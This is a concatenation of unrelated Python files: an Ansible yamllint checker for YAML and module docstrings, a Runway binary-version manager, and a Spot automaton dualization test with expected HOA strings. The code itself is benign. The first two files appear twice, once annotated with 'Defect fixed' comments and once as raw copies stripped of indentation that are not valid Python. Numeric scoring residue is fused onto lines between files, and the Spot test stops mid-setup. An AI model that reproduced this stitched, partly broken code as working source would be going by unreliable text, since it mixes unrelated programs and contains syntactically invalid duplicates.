class TestConstructor(SafeConstructor):
    """Yaml Safe Constructor that knows about Ansible tags"""

    def construct_yaml_unsafe(self, node):
        """Construct an !unsafe node via the constructor matching its kind."""
        try:
            # node.id names the node kind ('scalar', 'sequence', ...);
            # map it to the matching construct_* method.  getattr on
            # self raises AttributeError if no such method exists.
            constructor = getattr(node, 'id', 'object')
            if constructor is not None:
                constructor = getattr(self, 'construct_%s' % constructor)
        except AttributeError:
            # Fall back to generic object construction.
            constructor = self.construct_object

        value = constructor(node)

        return value
# Teach the constructor about Ansible-specific tags: !unsafe values are
# constructed according to their node kind, vault payloads are kept as
# plain strings.
TestConstructor.add_constructor(
    u'!unsafe',
    TestConstructor.construct_yaml_unsafe)

TestConstructor.add_constructor(
    u'!vault',
    TestConstructor.construct_yaml_str)

TestConstructor.add_constructor(
    u'!vault-encrypted',
    TestConstructor.construct_yaml_str)
class TestLoader(CParser, TestConstructor, Resolver):
    """libyaml-backed loader wired up with the Ansible-aware constructor."""

    def __init__(self, stream):
        CParser.__init__(self, stream)
        TestConstructor.__init__(self)
        Resolver.__init__(self)
class YamlChecker:
    """Wrapper around yamllint that supports YAML embedded in Ansible modules."""

    def __init__(self):
        # Lint/parse findings accumulated across check() calls and
        # emitted as JSON by report().
        self.messages = []

    def report(self):
        """Print yamllint report to stdout."""
        report = dict(
            messages=self.messages,
        )

        print(json.dumps(report, indent=4, sort_keys=True))

    def check(self, paths):
        """Check the given files, dispatching on file extension.

        :type paths: t.List[str]
        """
        config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config')

        yaml_conf = YamlLintConfig(file=os.path.join(config_path, 'default.yml'))
        module_conf = YamlLintConfig(file=os.path.join(config_path, 'modules.yml'))
        plugin_conf = YamlLintConfig(file=os.path.join(config_path, 'plugins.yml'))

        for path in paths:
            extension = os.path.splitext(path)[1]

            with open(path) as f:
                contents = f.read()

            if extension in ('.yml', '.yaml'):
                self.check_yaml(yaml_conf, path, contents)
            elif extension == '.py':
                # Modules and other plugins get different yamllint configs.
                if path.startswith('lib/ansible/modules/') or path.startswith('plugins/modules/'):
                    conf = module_conf
                else:
                    conf = plugin_conf

                self.check_module(conf, path, contents)
            else:
                raise Exception('unsupported extension: %s' % extension)

    def check_yaml(self, conf, path, contents):
        """Lint a stand-alone YAML file.

        :type conf: YamlLintConfig
        :type path: str
        :type contents: str
        """
        self.check_parsable(path, contents)
        self.messages += [self.result_to_message(r, path) for r in linter.run(contents, conf, path)]

    def check_module(self, conf, path, contents):
        """Lint the YAML documentation strings embedded in a Python module.

        :type conf: YamlLintConfig
        :type path: str
        :type contents: str
        """
        docs = self.get_module_docs(path, contents)

        for key, value in docs.items():
            yaml_data = value['yaml']
            lineno = value['lineno']
            fmt = value['fmt']

            if fmt != 'yaml':
                # A "# fmt: <name>" marker opted this string out of
                # YAML linting.
                continue

            if yaml_data.startswith('\n'):
                # Drop the newline right after the opening quotes and
                # keep the reported line numbers aligned.
                yaml_data = yaml_data[1:]
                lineno += 1

            self.check_parsable(path, yaml_data, lineno)

            messages = list(linter.run(yaml_data, conf, path))

            # lineno - 1 turns the assignment's line into an offset for
            # the 1-based line numbers yamllint reports.
            self.messages += [self.result_to_message(r, path, lineno - 1, key) for r in messages]

    def check_parsable(self, path, contents, lineno=1):
        """Record an error message if libyaml cannot parse ``contents``.

        :type path: str
        :type contents: str
        :type lineno: int
        """
        try:
            yaml.load(contents, Loader=TestLoader)
        except MarkedYAMLError as e:
            self.messages += [{'code': 'unparsable-with-libyaml',
                               'message': '%s - %s' % (e.args[0], e.args[2]),
                               'path': path,
                               'line': e.problem_mark.line + lineno,
                               'column': e.problem_mark.column + 1,
                               'level': 'error',
                               }]

    @staticmethod
    def result_to_message(result, path, line_offset=0, prefix=''):
        """Convert a yamllint result into a report message dict.

        :type result: any
        :type path: str
        :type line_offset: int
        :type prefix: str
        :rtype: dict[str, any]
        """
        if prefix:
            prefix = '%s: ' % prefix

        return dict(
            code=result.rule or result.level,
            message=prefix + result.desc,
            path=path,
            line=result.line + line_offset,
            column=result.column,
            level=result.level,
        )

    def get_module_docs(self, path, contents):
        """Extract DOCUMENTATION/EXAMPLES/RETURN strings from a module.

        :type path: str
        :type contents: str
        :rtype: dict[str, any]
        """
        module_doc_types = [
            'DOCUMENTATION',
            'EXAMPLES',
            'RETURN',
        ]

        docs = {}

        fmt_re = re.compile(r'^# fmt:\s+(\S+)')

        def check_assignment(statement, doc_types=None):
            """Check the given statement for a documentation assignment."""
            for target in statement.targets:
                if not isinstance(target, ast.Name):
                    continue

                if doc_types and target.id not in doc_types:
                    continue

                # A leading "# fmt: <name>" comment inside the string
                # overrides the default YAML format.
                fmt_match = fmt_re.match(statement.value.s.lstrip())
                fmt = 'yaml'
                if fmt_match:
                    fmt = fmt_match.group(1)

                docs[target.id] = dict(
                    yaml=statement.value.s,
                    lineno=statement.lineno,
                    end_lineno=statement.lineno + len(statement.value.s.splitlines()),
                    fmt=fmt.lower(),
                )

        module_ast = self.parse_module(path, contents)

        if not module_ast:
            return {}

        is_plugin = path.startswith('lib/ansible/modules/') or path.startswith('lib/ansible/plugins/') or path.startswith('plugins/')
        is_doc_fragment = path.startswith('lib/ansible/plugins/doc_fragments/') or path.startswith('plugins/doc_fragments/')

        if is_plugin and not is_doc_fragment:
            # Plugins/modules: only top-level assignments count.
            for body_statement in module_ast.body:
                if isinstance(body_statement, ast.Assign):
                    check_assignment(body_statement, module_doc_types)
        elif is_doc_fragment:
            # Doc fragments: any assignment inside a class body counts.
            for body_statement in module_ast.body:
                if isinstance(body_statement, ast.ClassDef):
                    for class_statement in body_statement.body:
                        if isinstance(class_statement, ast.Assign):
                            check_assignment(class_statement)
        else:
            raise Exception('unsupported path: %s' % path)

        return docs

    def parse_module(self, path, contents):
        """Parse the given contents, recording any errors encountered.

        :type path: str
        :type contents: str
        :rtype: ast.Module | None
        """
        try:
            return ast.parse(contents)
        except SyntaxError as ex:
            self.messages.append(dict(
                code='python-syntax-error',
                message=str(ex),
                path=path,
                line=ex.lineno,
                column=ex.offset,
                level='error',
            ))
        except Exception as ex:  # pylint: disable=broad-except
            self.messages.append(dict(
                code='python-parse-error',
                message=str(ex),
                path=path,
                line=0,
                column=0,
                level='error',
            ))

        return None
# Defect fixed: the original final line was fused with dataset-row
# residue ("| venv/...yamllinter.py | ..."); restore the plain guard.
if __name__ == '__main__':
    main()
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import json
import os
import re
import sys
import yaml
from yaml.resolver import Resolver
from yaml.constructor import SafeConstructor
from yaml.error import MarkedYAMLError
from _yaml import CParser # pylint: disable=no-name-in-module
from yamllint import linter
from yamllint.config import YamlLintConfig
def main():
"""Main program body."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
checker = YamlChecker()
checker.check(paths)
checker.report()
class TestConstructor(SafeConstructor):
"""Yaml Safe Constructor that knows about Ansible tags"""
def construct_yaml_unsafe(self, node):
try:
constructor = getattr(node, 'id', 'object')
if constructor is not None:
constructor = getattr(self, 'construct_%s' % constructor)
except AttributeError:
constructor = self.construct_object
value = constructor(node)
return value
TestConstructor.add_constructor(
u'!unsafe',
TestConstructor.construct_yaml_unsafe)
TestConstructor.add_constructor(
u'!vault',
TestConstructor.construct_yaml_str)
TestConstructor.add_constructor(
u'!vault-encrypted',
TestConstructor.construct_yaml_str)
class TestLoader(CParser, TestConstructor, Resolver):
def __init__(self, stream):
CParser.__init__(self, stream)
TestConstructor.__init__(self)
Resolver.__init__(self)
class YamlChecker:
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
def __init__(self):
self.messages = []
def report(self):
"""Print yamllint report to stdout."""
report = dict(
messages=self.messages,
)
print(json.dumps(report, indent=4, sort_keys=True))
def check(self, paths):
"""
:type paths: t.List[str]
"""
config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config')
yaml_conf = YamlLintConfig(file=os.path.join(config_path, 'default.yml'))
module_conf = YamlLintConfig(file=os.path.join(config_path, 'modules.yml'))
plugin_conf = YamlLintConfig(file=os.path.join(config_path, 'plugins.yml'))
for path in paths:
extension = os.path.splitext(path)[1]
with open(path) as f:
contents = f.read()
if extension in ('.yml', '.yaml'):
self.check_yaml(yaml_conf, path, contents)
elif extension == '.py':
if path.startswith('lib/ansible/modules/') or path.startswith('plugins/modules/'):
conf = module_conf
else:
conf = plugin_conf
self.check_module(conf, path, contents)
else:
raise Exception('unsupported extension: %s' % extension)
def check_yaml(self, conf, path, contents):
"""
:type conf: YamlLintConfig
:type path: str
:type contents: str
"""
self.check_parsable(path, contents)
self.messages += [self.result_to_message(r, path) for r in linter.run(contents, conf, path)]
def check_module(self, conf, path, contents):
"""
:type conf: YamlLintConfig
:type path: str
:type contents: str
"""
docs = self.get_module_docs(path, contents)
for key, value in docs.items():
yaml_data = value['yaml']
lineno = value['lineno']
fmt = value['fmt']
if fmt != 'yaml':
continue
if yaml_data.startswith('\n'):
yaml_data = yaml_data[1:]
lineno += 1
self.check_parsable(path, yaml_data, lineno)
messages = list(linter.run(yaml_data, conf, path))
self.messages += [self.result_to_message(r, path, lineno - 1, key) for r in messages]
def check_parsable(self, path, contents, lineno=1):
"""
:type path: str
:type contents: str
:type lineno: int
"""
try:
yaml.load(contents, Loader=TestLoader)
except MarkedYAMLError as e:
self.messages += [{'code': 'unparsable-with-libyaml',
'message': '%s - %s' % (e.args[0], e.args[2]),
'path': path,
'line': e.problem_mark.line + lineno,
'column': e.problem_mark.column + 1,
'level': 'error',
}]
@staticmethod
def result_to_message(result, path, line_offset=0, prefix=''):
"""
:type result: any
:type path: str
:type line_offset: int
:type prefix: str
:rtype: dict[str, any]
"""
if prefix:
prefix = '%s: ' % prefix
return dict(
code=result.rule or result.level,
message=prefix + result.desc,
path=path,
line=result.line + line_offset,
column=result.column,
level=result.level,
)
def get_module_docs(self, path, contents):
"""
:type path: str
:type contents: str
:rtype: dict[str, any]
"""
module_doc_types = [
'DOCUMENTATION',
'EXAMPLES',
'RETURN',
]
docs = {}
fmt_re = re.compile(r'^# fmt:\s+(\S+)')
def check_assignment(statement, doc_types=None):
"""Check the given statement for a documentation assignment."""
for target in statement.targets:
if not isinstance(target, ast.Name):
continue
if doc_types and target.id not in doc_types:
continue
fmt_match = fmt_re.match(statement.value.s.lstrip())
fmt = 'yaml'
if fmt_match:
fmt = fmt_match.group(1)
docs[target.id] = dict(
yaml=statement.value.s,
lineno=statement.lineno,
end_lineno=statement.lineno + len(statement.value.s.splitlines()),
fmt=fmt.lower(),
)
module_ast = self.parse_module(path, contents)
if not module_ast:
return {}
is_plugin = path.startswith('lib/ansible/modules/') or path.startswith('lib/ansible/plugins/') or path.startswith('plugins/')
is_doc_fragment = path.startswith('lib/ansible/plugins/doc_fragments/') or path.startswith('plugins/doc_fragments/')
if is_plugin and not is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.Assign):
check_assignment(body_statement, module_doc_types)
elif is_doc_fragment:
for body_statement in module_ast.body:
if isinstance(body_statement, ast.ClassDef):
for class_statement in body_statement.body:
if isinstance(class_statement, ast.Assign):
check_assignment(class_statement)
else:
raise Exception('unsupported path: %s' % path)
return docs
def parse_module(self, path, contents):
"""
:type path: str
:type contents: str
:rtype: ast.Module | None
"""
try:
return ast.parse(contents)
except SyntaxError as ex:
self.messages.append(dict(
code='python-syntax-error',
message=str(ex),
path=path,
line=ex.lineno,
column=ex.offset,
level='error',
))
except Exception as ex: # pylint: disable=broad-except
self.messages.append(dict(
code='python-parse-error',
message=str(ex),
path=path,
line=0,
column=0,
level='error',
))
return None
if __name__ == '__main__':
main() | 0.543833 | 0.167729 |
from __future__ import annotations
import logging
import os
import platform
import shutil
import sys
from pathlib import Path
from typing import TYPE_CHECKING, Any, Generator, Optional, Tuple, Union, cast
from ..compat import cached_property
if TYPE_CHECKING:
from urllib.error import URLError
from runway._logging import RunwayLogger
LOGGER = cast("RunwayLogger", logging.getLogger(__name__))
def handle_bin_download_error(exc: URLError, name: str) -> None:
    """Give user info about their failed download.

    Args:
        exc: The URLError raised while downloading ``name``.
        name: Human-readable name of the binary being downloaded.

    Raises:
        URLError: Re-raised unchanged when the failure is not a TLS
            certificate-verification problem.
        SystemExit: Always raised (exit code 1) after logging a TLS
            certificate-verification failure.

    """
    url_error_msg = str(exc.reason)

    if "CERTIFICATE_VERIFY_FAILED" not in url_error_msg:
        raise exc
    LOGGER.error(
        "Attempted to download %s but was unable to verify the TLS "
        "certificate on its download site.",
        name,
    )
    LOGGER.error("Full TLS error message: %s", url_error_msg)
    if platform.system().startswith("Darwin") and (
        "unable to get local issuer certificate" in url_error_msg
    ):
        # Defect fixed: the original message had a stray quote after the
        # slash ('.../"Install ...'), garbling the suggested command.
        LOGGER.error(
            "This is likely caused by your Python installation missing root certificates. "
            'Run "/Applications/Python %s.%s/Install Certificates.command" to fix it '
            "(https://stackoverflow.com/a/42334357/2547802)",
            sys.version_info[0],
            sys.version_info[1],
        )
    sys.exit(1)
class EnvManager:
    """Base environment manager class.

    Defects fixed: garbled "binPath to the binary" attribute doc; the
    ``versions_dir`` docstring claimed the directory is created, which
    the code does not do; dataset-row residue fused onto the final
    ``return False`` line was removed.

    Attributes:
        bin: Path to the binary of the current version.
        current_version: The current binary version being used.
        env_dir_name: Name of the directory within the users home
            directory where binary versions will be stored.
        path: The current working directory.

    """

    _bin_name: str
    current_version: Optional[str]
    env_dir_name: str
    path: Path

    def __init__(
        self, bin_name: str, dir_name: str, path: Optional[Path] = None
    ) -> None:
        """Initialize class.

        Args:
            bin_name: Name of the binary file (e.g. kubectl).
            dir_name: Name of the directory within the users home
                directory where binary versions will be stored.
            path: The current working directory.

        """
        self._bin_name = bin_name + self.command_suffix
        self.current_version = None
        # Hidden ("dot") directory everywhere except Windows.
        self.env_dir_name = (
            dir_name if platform.system() == "Windows" else "." + dir_name
        )
        self.path = Path.cwd() if not path else path

    @property
    def bin(self) -> Path:
        """Path to the version binary.

        Falls back to an unversioned path when no current version is set.

        """
        if self.current_version:
            return self.versions_dir / self.current_version / self._bin_name
        return self.versions_dir / self._bin_name

    @cached_property
    def command_suffix(self) -> str:  # pylint: disable=no-self-use
        """Return command suffix based on platform.system."""
        if platform.system() == "Windows":
            return ".exe"
        return ""

    @cached_property
    def env_dir(self) -> Path:
        """Return the directory used to store version binaries."""
        if platform.system() == "Windows":
            if "APPDATA" in os.environ:
                return Path(os.environ["APPDATA"]) / self.env_dir_name
            return Path.home() / "AppData" / "Roaming" / self.env_dir_name
        return Path.home() / self.env_dir_name

    @cached_property
    def versions_dir(self) -> Path:
        """Return the directory used to store binary versions.

        The directory is not created here; callers are responsible for
        creating it when installing a version.

        """
        return self.env_dir / "versions"

    @cached_property
    def version_file(self) -> Optional[Path]:
        """Find and return a "<bin version file>" file if one is present.

        Returns:
            Path to the <bin> version file.

        """
        raise NotImplementedError

    def install(self, version_requested: Optional[str] = None) -> str:
        """Ensure <bin> is installed."""
        raise NotImplementedError

    def list_installed(self) -> Generator[Path, None, None]:
        """List installed versions of <bin>."""
        raise NotImplementedError

    def uninstall(self, version: Union[str, Tuple[Any, ...]]) -> bool:
        """Uninstall a version of the managed binary.

        Args:
            version: Version of binary to uninstall.

        Returns:
            Whether a version of the binary was uninstalled or not.

        """
        version_dir = self.versions_dir / str(version)
        if version_dir.is_dir():
            LOGGER.notice(
                "uninstalling %s %s from %s...",
                self._bin_name,
                version,
                self.versions_dir,
            )
            shutil.rmtree(version_dir)
            LOGGER.success("uninstalled %s %s", self._bin_name, version)
            return True
        LOGGER.error("%s %s not installed", self._bin_name, version)
        return False
import logging
import os
import platform
import shutil
import sys
from pathlib import Path
from typing import TYPE_CHECKING, Any, Generator, Optional, Tuple, Union, cast
from ..compat import cached_property
if TYPE_CHECKING:
from urllib.error import URLError
from runway._logging import RunwayLogger
LOGGER = cast("RunwayLogger", logging.getLogger(__name__))
def handle_bin_download_error(exc: URLError, name: str) -> None:
"""Give user info about their failed download.
Raises:
SystemExit: Always raised after logging reason.
"""
url_error_msg = str(exc.reason)
if "CERTIFICATE_VERIFY_FAILED" not in url_error_msg:
raise exc
LOGGER.error(
"Attempted to download %s but was unable to verify the TLS "
"certificate on its download site.",
name,
)
LOGGER.error("Full TLS error message: %s", url_error_msg)
if platform.system().startswith("Darwin") and (
"unable to get local issuer certificate" in url_error_msg
):
LOGGER.error(
"This is likely caused by your Python installation missing root certificates. "
'Run "/Applications/Python %s.%s/"Install Certificates.command" to fix it '
"(https://stackoverflow.com/a/42334357/2547802)",
sys.version_info[0],
sys.version_info[1],
)
sys.exit(1)
class EnvManager:
"""Base environment manager class.
Attributes:
binPath to the binary of the current version.
current_version: The current binary version being used.
env_dir_name: Name of the directory within the users home
directory where binary versions will be stored.
path: The current working directory.
"""
_bin_name: str
current_version: Optional[str]
env_dir_name: str
path: Path
def __init__(
self, bin_name: str, dir_name: str, path: Optional[Path] = None
) -> None:
"""Initialize class.
Args:
bin_name: Name of the binary file (e.g. kubectl)
dir_name: Name of the directory within the users home
directory where binary versions will be stored.
path: The current working directory.
"""
self._bin_name = bin_name + self.command_suffix
self.current_version = None
self.env_dir_name = (
dir_name if platform.system() == "Windows" else "." + dir_name
)
self.path = Path.cwd() if not path else path
@property
def bin(self) -> Path:
"""Path to the version binary.
Returns:
Path
"""
if self.current_version:
return self.versions_dir / self.current_version / self._bin_name
return self.versions_dir / self._bin_name
@cached_property
def command_suffix(self) -> str: # pylint: disable=no-self-use
"""Return command suffix based on platform.system."""
if platform.system() == "Windows":
return ".exe"
return ""
@cached_property
def env_dir(self) -> Path:
"""Return the directory used to store version binaries."""
if platform.system() == "Windows":
if "APPDATA" in os.environ:
return Path(os.environ["APPDATA"]) / self.env_dir_name
return Path.home() / "AppData" / "Roaming" / self.env_dir_name
return Path.home() / self.env_dir_name
@cached_property
def versions_dir(self) -> Path:
"""Return the directory used to store binary.
When first used, the existence of the directory is checked and it is
created if needed.
"""
return self.env_dir / "versions"
@cached_property
def version_file(self) -> Optional[Path]:
"""Find and return a "<bin version file>" file if one is present.
Returns:
Path to the <bin> version file.
"""
raise NotImplementedError
def install(self, version_requested: Optional[str] = None) -> str:
"""Ensure <bin> is installed."""
raise NotImplementedError
def list_installed(self) -> Generator[Path, None, None]:
"""List installed versions of <bin>."""
raise NotImplementedError
def uninstall(self, version: Union[str, Tuple[Any, ...]]) -> bool:
"""Uninstall a version of the managed binary.
Args:
version: Version of binary to uninstall.
Returns:
Whether a version of the binary was uninstalled or not.
"""
version_dir = self.versions_dir / str(version)
if version_dir.is_dir():
LOGGER.notice(
"uninstalling %s %s from %s...",
self._bin_name,
version,
self.versions_dir,
)
shutil.rmtree(version_dir)
LOGGER.success("uninstalled %s %s", self._bin_name, version)
return True
LOGGER.error("%s %s not installed", self._bin_name, version)
return False | 0.805976 | 0.13012 |
import spot
import buddy
# Pairs of acceptance-type predicates that may legitimately match
# between an automaton and its dual (e.g. Buchi <-> co-Buchi).
match_strings = [('is_buchi', 'is_co_buchi'),
                 ('is_generalized_buchi', 'is_generalized_co_buchi'),
                 ('is_all', 'is_none'),
                 ('is_all', 'is_all'),
                 ('is_buchi', 'is_all')]
# existential and universal are dual
# deterministic is self-dual
def dualtype(aut, dual):
    """Check that ``dual`` has the transition modes expected of the
    dual of ``aut``: determinism preserved, existential/universal
    branching swapped.  Trivially true for a no-acceptance dual."""
    if dual.acc().is_none():
        return True
    if spot.is_deterministic(aut) and not spot.is_deterministic(dual):
        return False
    if not spot.is_universal(dual) and aut.is_existential():
        return False
    return dual.is_existential() or not spot.is_universal(aut)
def produce_phi(rg, n):
    """Pull ``n`` formulas from the random-formula generator ``rg``."""
    return [rg.next() for _ in range(n)]
def produce_automaton(phi):
    """Translate each formula in ``phi`` into an automaton."""
    return [spot.translate(f) for f in phi]
def test_aut(aut, d=None):
    """Check that ``d`` (or dualize(aut) if None) is a valid dual of aut.

    Returns a (ok, message) pair.  Defect fixed: the original computed
    four locals (complete, univ, an, dn) that were never used; the dead
    code is removed.
    """
    if d is None:
        d = spot.dualize(aut)

    if not dualtype(aut, d):
        return (False, 'Incorrect transition mode resulting of dual')

    aa = aut.acc()
    da = d.acc()
    # Accept when any allowed acceptance-type pairing matches in either
    # direction (aut/dual or dual/aut).
    for first, second in match_strings:
        if ((getattr(aa, first)() and getattr(da, second)())
                or (getattr(aa, second)() and getattr(da, first)())):
            return (True, '')
    return (False, 'Incorrect acceptance type dual')
# Tests that a (deterministic) automaton and its complement have complementary
# languages.
# FIXME This test could be extended to non-deterministic automata with a
# dealternization procedure.
def test_complement(aut):
    """Assert that aut and its dual accept complementary languages."""
    assert aut.is_deterministic()
    dual = spot.dualize(aut)
    union = spot.product_or(aut, dual)
    # The union covers everything iff its dual is empty.
    assert spot.dualize(union).is_empty()
def test_assert(a, d=None):
    """Run test_aut and, on failure, dump both automata before asserting."""
    ok, why = test_aut(a, d)
    if not ok:
        print(why)
        print(a.to_str('hoa'))
        print(spot.dualize(a).to_str('hoa'))
        assert False
# Smoke test: the dual of the Buchi automaton for 'a' must be the
# expected co-Buchi automaton (HOA output compared verbatim).
aut = spot.translate('a')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 1
AP: 1 "a"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic stutter-invariant very-weak
--BODY--
State: 0 {0}
[t] 0
State: 1
[0] 0
[!0] 2
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2 {0}
[1] 2
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 3
[0] 1&2
State: 1 {0}
[0] 1
[!0] 3
State: 2 {0}
[1] 2
[!1] 3
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {0}
[t] 3
--END--""")
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0&2
AP: 2 "a" "b"
Acceptance: 2 Inf(0) | Inf(1)
properties: trans-labels explicit-labels state-acc univ-branch
--BODY--
State: 0
[0] 1
State: 1 {0}
[t] 1
State: 2
[1] 3
State: 3 {1}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 1
AP: 2 "a" "b"
acc-name: all
Acceptance: 0 t
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[t] 0
State: 1
[!0 | !1] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
State: 1 {0}
[0] 3
State: 2
[0] 3
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0 {0}
[0] 1
[!0] 4
State: 1 {0}
[0] 3
[!0] 4
State: 2 {0}
[0] 3
[!0] 4
State: 3 {0}
[t] 3
State: 4
[t] 4
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 2 Inf(0) & Fin(1)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
State: 1 {1}
[1] 1
[0&!1] 2
State: 2
[!0&!1] 0
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 4
Start: 0
AP: 2 "a" "b"
acc-name: Streett 1
Acceptance: 2 Fin(0) | Inf(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&!1] 1
[0&1] 2
[!0] 3
State: 1 {1}
[1] 1
[0&!1] 2
[!0&!1] 3
State: 2
[0 | 1] 2
[!0&!1] 0&2
State: 3
[t] 3
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
[0] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Inf(0) | Fin(0)
properties: trans-labels explicit-labels state-acc complete
--BODY--
State: 0
[0] 1
[!0] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 1
Start: 0
AP: 1 "a"
acc-name: none
Acceptance: 0 f
properties: trans-labels explicit-labels state-acc complete
properties: deterministic terminal
--BODY--
State: 0
[t] 0
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels trans-acc
--BODY--
State: 0
[0&1] 1
[0&!1] 2
State: 1
[t] 1 {0}
[0] 0
State: 2
[0] 2
--END--""")
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0&1] 1
[!0 | !1] 2
State: 1 {0}
[t] 1
State: 2
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[0] 2
State: 1 {0}
[0] 1
State: 2
[t] 2
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 2
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc deterministic
--BODY--
State: 0
[!0] 1
State: 1 {0}
[t] 1
--END--"""
aut = spot.automaton("""
HOA: v1
States: 4
Start: 0
AP: 1 "a"
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc
--BODY--
State: 0
[0] 1
[!0] 2
[0] 0
State: 1 {0}
[t] 1
State: 2
[0] 3
[!0] 0
State: 3 {0}
[t] 3
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: Buchi
Acceptance: 1 Inf(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic
--BODY--
State: 0
[0] 0
[!0] 1
State: 1
[!0] 0
[0] 2
State: 2 {0}
[t] 2
--END--"""
aut = spot.automaton("""
HOA: v1
States: 3
Start: 0
AP: 1 "a"
Acceptance: 2 Fin(0) & Inf(1)
properties: trans-labels explicit-labels
--BODY--
State: 0
[!0] 0
[0] 1 {0}
[0] 2 {1}
State: 1
[t] 0
State: 2
[t] 0
--END--""")
dual = spot.dualize(aut)
assert dualtype(aut, dual)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 3
Start: 0
AP: 1 "a"
acc-name: parity min even 2
Acceptance: 2 Inf(0) | Fin(1)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0
[!0] 0
[0] 1&2
State: 1 {0}
[t] 0
State: 2 {1}
[t] 0
--END--"""
aut = spot.translate('G!a R XFb')
test_assert(aut)
dual = spot.dualize(aut)
h = dual.to_str('hoa')
assert h == """HOA: v1
States: 5
Start: 0
AP: 2 "a" "b"
acc-name: co-Buchi
Acceptance: 1 Fin(0)
properties: trans-labels explicit-labels state-acc complete
properties: deterministic univ-branch
--BODY--
State: 0 {0}
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 1
[0&1] 0
[0&!1] 1
[!0&!1] 1&2
[!0&1] 0&2
State: 2
[!0&1] 3
[0 | !1] 4
State: 3 {0}
[!0] 3
[0] 4
State: 4
[t] 4
--END--"""
opts = spot.option_map()
opts.set('output', spot.randltlgenerator.LTL)
opts.set('tree_size_min', 15)
opts.set('tree_size_max', 15)
opts.set('seed', 0)
opts.set('simplification_level', 0)
